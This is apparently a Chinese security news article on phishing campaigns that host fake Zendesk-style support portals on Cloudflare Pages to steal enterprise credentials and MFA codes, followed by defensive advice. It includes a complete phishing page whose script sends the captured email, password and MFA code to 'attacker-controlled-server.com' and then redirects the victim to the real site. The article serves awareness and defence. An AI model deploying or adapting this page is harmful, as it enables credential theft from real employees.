钓鱼新变种:攻击者借Cloudflare Pages与Zendesk“合法外衣”伪造客服门户,企业凭证安全防线告急

简介: 一封伪装成工单升级的钓鱼邮件,利用Cloudflare Pages和Zendesk等可信平台托管仿冒页面,窃取企业账户凭证。攻击者绕过MFA,盗取会话Cookie,数小时内入侵财务系统。此类新型钓鱼依托合法域名规避传统防御,暴露“可信即安全”的认知盲区。专家呼吁构建零信任模型,强化行为监测与员工培训,应对日益隐蔽的网络威胁。(238字)

一、一封“工单升级”邮件,竟成企业账户失守的导火索

2025年11月下旬,华东某跨境电商公司IT部门收到一封看似来自内部Zendesk支持系统的邮件。邮件主题为“【紧急】您的工单 #8472 已触发SLA超时,请立即验证身份以继续处理”。邮件内容专业、排版规范,附带一个“查看详情”的按钮,链接指向 support-verify.yourbrand.zendesk.com。

点击后,页面加载迅速,品牌Logo、配色方案、字体样式与该公司真实客服门户几乎一致。用户被要求“重新登录以确认身份”,并输入一次性验证码(MFA)。操作完成后,系统提示“验证成功,工单正在处理中”。

然而,短短两小时后,该公司财务系统后台出现异常登录记录——攻击者利用窃取的会话Cookie,绕过了MFA,直接访问了包含供应商付款信息的敏感模块。

这并非孤例。过去三个月,全球至少有17起类似事件被公开披露,涉及金融、制造、SaaS服务等多个行业。而这些钓鱼页面的共同点在于:它们并非托管在可疑域名或黑产服务器上,而是“光明正大”地运行在 Cloudflare Pages 和 Zendesk Help Center 这类主流、可信的云服务平台之上。

二、合法平台成“钓鱼温床”?攻击者如何钻空子

传统反钓鱼机制高度依赖域名信誉体系。例如,企业邮件网关会自动拦截来自 .xyz、.top 或已知恶意IP的链接;浏览器也会对列入黑名单的站点弹出警告。但当钓鱼页面出现在 *.pages.dev(Cloudflar Pages默认子域)或 *.zendesk.com(Zendesk官方托管域)之下时,这些防线瞬间失效。

“这相当于小偷穿上了保安制服,在大厦正门刷卡进入。”公共互联网反网络钓鱼工作组技术专家芦笛指出,“攻击者不再需要注册域名、租用VPS、配置SSL证书——这些繁琐且易被追踪的步骤,如今只需一个免费账号和几行代码即可完成。”

技术拆解:一页代码,即可构建高仿真钓鱼门户

以 Cloudflare Pages 为例,攻击者只需以下几步:

注册 Cloudflare 账号(无需实名,支持匿名邮箱);

创建静态网站项目,上传仿冒页面HTML/CSS/JS;

绑定自定义子路径或使用默认 *.pages.dev 域名;

嵌入数据回传逻辑(如通过 Webhook 或代理转发)。

下面是一个简化版的钓鱼页面核心代码片段(仅用于技术分析,严禁滥用):

<!-- fake-support.html -->

<!DOCTYPE html>

<html>

<head>

<meta charset="UTF-8">

<title>【YourBrand】客服支持中心</title>

<link rel="stylesheet" href="/assets/yourbrand-style.css">

</head>

<body>

<div>

<img src="/logo.png" alt="YourBrand Logo">

<h2>请验证您的账户以继续处理工单 #8472</h2>

<form id="phishForm">

<input type="email" name="email" placeholder="企业邮箱" required>

<input type="password" name="password" placeholder="密码" required>

<input type="text" name="mfa_code" placeholder="一次性验证码 (MFA)" required>

<button type="submit">提交验证</button>

</form>

</div>

<script>

document.getElementById('phishForm').addEventListener('submit', async (e) => {

e.preventDefault();

const data = new FormData(e.target);

// 将凭证发送至攻击者控制的Webhook(如Discord、Telegram Bot或自建API)

await fetch('https://attacker-controlled-server.com/collect', {

method: 'POST',

body: JSON.stringify(Object.fromEntries(data)),

headers: {'Content-Type': 'application/json'}

});

// 模拟“验证成功”,跳转至真实Zendesk页面以消除怀疑

window.location.href = 'https://yourbrand.zendesk.com/hc/zh-cn';

});

</script>

</body>

</html>

更高级的攻击甚至会部署 反向代理(Reverse Proxy) 或 中间人(AitM, Adversary-in-the-Middle) 架构。例如,攻击者搭建一个代理层,将用户请求实时转发至真实Zendesk页面,同时截获登录过程中的 Cookie、Session Token 和 MFA 响应。这种方式下,用户看到的是完全真实的界面,连 HTTPS 锁图标都毫无破绽。

“这种攻击最难防御的地方在于:页面本身是‘干净’的,行为却极度危险。”芦笛强调,“传统WAF或内容扫描工具很难识别一段看似正常的HTML表单是否用于窃取凭证。”

三、国际案例频发,国内企业敲响警钟

2025年9月,美国网络安全公司 Proofpoint 披露了一起针对科技企业的钓鱼活动。攻击者利用 Cloudflare Pages 托管伪造的 Okta 登录页,并通过 LinkedIn 私信发送“安全警报”链接。受害者点击后,被引导至 okta-verify.pages.dev,页面完美复刻 Okta UI,甚至动态加载受害者公司Logo(通过URL参数注入)。该活动在两周内窃取了超过200个企业账户凭证。

同年10月,欧洲某银行遭遇类似攻击。钓鱼页面托管于 Zendesk 子域,伪装成“GDPR数据请求处理中心”,诱导员工上传包含客户身份证与银行卡信息的“合规文件”。事后调查发现,攻击者通过 Zendesk 的自定义主题功能注入恶意 JavaScript,实现数据外泄。

这些案例虽发生于海外,但对国内企业具有极强的警示意义。随着中国企业加速出海、广泛采用 SaaS 工具(如 Zendesk、Intercom、Freshdesk),以及越来越多开发者使用 Cloudflare Pages 部署官网或文档站,攻击面正在同步扩大。

“我们监测到,2025年下半年,国内针对企业客服流程的钓鱼尝试同比增长320%。”芦笛透露,“其中约35%的样本使用了主流云平台托管,且近半数能绕过企业现有邮件安全网关。”

四、为何传统防御失效?三大认知盲区亟待破除

盲区一:“可信域名=安全内容”

许多企业安全策略仍将“域名白名单”作为核心防线。例如,允许员工访问 *.zendesk.com、*.cloudflare.com 等。但正如前文所述,这些平台允许用户自定义内容,域名可信 ≠ 页面可信。

盲区二:“MFA万能论”

不少企业认为启用多因素认证(MFA)即可高枕无忧。然而,在 AitM 攻击模式下,攻击者可实时代理用户与真实服务之间的通信,在用户完成MFA验证的瞬间窃取有效会话,从而完全绕过二次验证。

盲区三:“静态页面无害论”

安全团队常认为静态HTML页面无法执行复杂攻击。但现代钓鱼页面可通过 <script> 标签加载外部资源、调用浏览器 API(如 navigator.credentials.get() 尝试提取已保存密码)、甚至利用 Service Worker 实现持久化监听。

五、技术对抗升级:从“堵漏洞”到“重构信任模型”

面对新型钓鱼威胁,专家建议企业采取多层次防御策略,核心在于 “零信任”原则 与 “行为驱动的安全”。

1. 严格限制第三方托管内容的访问权限

对 Cloudflare Pages、GitHub Pages、Netlify 等平台实施 URL路径级白名单,而非简单放行整个域名。

使用 内容安全策略(CSP) 限制页面可加载的脚本来源。例如:

Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-cdn.com;

可有效阻止钓鱼页面加载外部数据回传脚本。

2. 强制高风险操作使用浏览器隔离或专用终端

对于涉及凭证输入、敏感数据上传的操作(如登录客服系统、提交工单附件),应通过 远程浏览器隔离(RBI) 或 虚拟应用容器 执行。即使页面被攻破,恶意代码也无法接触本地设备或网络。

3. 在通信链路中加入可验证签名

企业可在官方邮件或私信中嵌入 深度链接(Deep Link) 并附加数字签名。例如:

https://support.yourbrand.com/ticket/8472?sig=HMAC_SHA256(key, "8472")

用户点击后,目标页面需验证签名有效性,否则拒绝加载。此举可防止攻击者伪造“工单通知”。

4. 部署基于会话行为的MFA增强保护

即便会话Cookie被盗,也可通过以下机制阻断横向移动:

绑定设备指纹:将会话与浏览器 User-Agent、Canvas Hash、WebGL Renderer 等特征绑定;

实施短暂会话有效期:敏感操作需重新认证;

监控异常行为:如同一会话短时间内从不同国家登录,自动触发MFA挑战。

六、安全不是终点,而是持续博弈的过程

“网络钓鱼的本质从未改变——利用人性弱点。”芦笛总结道,“但攻击者的技术手段正在快速进化,从垃圾邮件到AI语音诈骗,再到如今的‘合法托管钓鱼’,每一步都在试探防御体系的边界。”

他呼吁企业摒弃“一次性加固”的思维,转而建立 动态感知-快速响应-持续教育 的闭环机制。例如,定期开展“红蓝对抗”演练,模拟 Cloudflare Pages 钓鱼场景;在IT支持流程中嵌入“二次确认”环节(如工单升级需电话核实);对员工进行“可疑链接识别”培训——不仅看域名,更要查页面行为。

与此同时,云服务商也需承担更多责任。芦笛建议 Cloudflare、Zendesk 等平台:

加强对新注册项目的自动化内容扫描;

对包含登录表单、敏感字段的页面实施人工审核;

提供安全标签(Security Tagging) 功能,允许企业标记“官方唯一支持入口”。

结语:在信任与怀疑之间,寻找安全的平衡点

当一个链接来自 *.zendesk.com,我们是否还应本能地信任它?当页面加载速度飞快、UI设计精美,我们是否就放松警惕?

这场攻防战的答案,或许不在于技术本身,而在于我们如何重新定义“可信”。在公共互联网日益复杂的今天,真正的安全,始于对“理所当然”的质疑。

而对于每一个企业而言,保护客户与员工的数据,不仅是技术责任,更是商业伦理的底线。在这场没有硝烟的战争中,唯有保持清醒、持续进化,方能在钓鱼者的“合法外衣”之下,守住那道看不见却至关重要的防线。

编辑:芦笛(公共互联网反网络钓鱼工作组)

目录
相关文章
|
2月前
|
Web App开发 安全 网络安全
伪装成“对账单”的远控木马:Coinbase钓鱼新套路暴露Windows端点安全盲区
2025年,黑客利用伪造Coinbase对账单邮件,诱导用户下载恶意程序,通过RAT远控木马窃取浏览器Cookie与2FA信息,实现账户接管。攻击链结合社会工程、端点入侵与权限绕过,暴露传统防御短板,警示全球用户提升安全意识,推动FIDO2认证与EDR部署,构建技术与习惯并重的数字安全防线。
105 4
|
2月前
|
监控 安全 前端开发
“熟人”私信藏杀机:LinkedIn钓鱼直击财务高管,企业社交平台成安全盲区
2025年,针对LinkedIn等职场社交平台的精准钓鱼攻击激增,攻击者伪装投资机构,利用私信诱导高管点击仿冒登录页,窃取凭证后实施财务欺诈。此类攻击绕过传统邮件防护,暴露企业安全盲区。专家呼吁推行浏览器隔离、FIDO2无密码认证及员工演练,构建纵深防御体系。
114 3
|
2月前
|
供应链 安全 网络协议
当“图片”会执行代码:SVG钓鱼载荷引爆新型供应链攻击,Amatera窃密与PureMiner挖矿暗流涌动
2025年,攻击者利用SVG发票图植入恶意代码,绕过传统防御,窃取数据并挖矿。此类“无害”文件实为武器,揭示格式信任背后的安全盲区,警示需从源头重构安全策略。
140 1
|
2月前
|
供应链 监控 安全
一封“2FA更新”邮件,险些让数亿开发者中招——NPM供应链钓鱼事件揭示开源生态的致命软肋
2025年9月,攻击者通过伪造NPM邮件窃取开发者账户,篡改20个高下载量JavaScript包,植入剪贴板劫持恶意代码,意图盗取加密货币钱包地址。事件暴露开源供应链脆弱性,凸显钓鱼防护、硬件密钥认证与发布流程审计的紧迫需求,呼吁构建从技术到文化的全链路防御体系。
138 1
|
2月前
|
机器学习/深度学习 人工智能 并行计算
AI语音克隆掀起“声”命危机:全球Vishing攻击激增,传统身份核验体系告急
2025年,AI语音诈骗席卷全球。伦敦一银行员工被克隆的CFO声音欺骗,转出230万欧元。生成式语音技术让“声纹复刻”轻而易举,传统KBA与语音OTP防线崩溃。从CEO诈骗到亲情骗局,攻击者利用开源模型实施精准社工攻击。防御需结合被动生物识别、多因素认证与行为分析。专家警示:声音已不可信,唯有提高警觉,重建信任机制,方能应对这场真实与伪造的战争。
141 1
|
3月前
|
人工智能 监控 安全
从数据发现到外发管控:安得终端DLP打造闭环数据防泄露方案
安得终端DLP系统构建覆盖数据全生命周期的防泄露体系,融合AI识别、智能分级、全通道管控与实时监控,实现敏感数据发现、保护、审计与响应一体化,助力企业精准防控终端数据泄露风险,保障业务合规与安全高效运转。(238字)
148 0
|
安全 小程序 PHP
PHP代码审计(七)Rips源代码审计系统使用教程
上一篇中提到的Seay源代码审计系统是由C#编写的winform程序,现在已经停止更新了,但是,还是比较好用的。 PHP代码审计还有另一个工具,也是一个神器Rips
707 0
|
4月前
|
安全 测试技术 Linux
Acunetix v25.11 发布,新增功能简介
Acunetix v25.11 发布,新增功能简介
250 11
Acunetix v25.11 发布,新增功能简介
|
9月前
|
Ubuntu 安全 数据安全/隐私保护
在Docker容器中部署GitLab服务器的步骤(面向Ubuntu 16.04)
现在,你已经成功地在Docker上部署了GitLab。这就是我们在星际中的壮举,轻松如同土豆一样简单!星际旅行结束,靠岸,打开舱门,迎接全新的代码时代。Prepare to code, astronaut!
578 12
|
12月前
|
人工智能 搜索推荐 算法
当AI代做PPT时,教师如何完成自我迭代?——从生成式人工智能(GAI)认证看教育者的未来突围
本文探讨了AI在教育领域的广泛应用及其对教师角色的挑战,强调知识观与教育观的转变。生成式人工智能(GAI)认证为教师提供了提升AI应用能力、促进教育创新的机会。文章建议教师通过转变观念、加强情感交流及参与创新实践完成自我迭代,并呼吁政府、学校和社会共同支持AI时代教育的发展,以培养适应未来的高素质人才。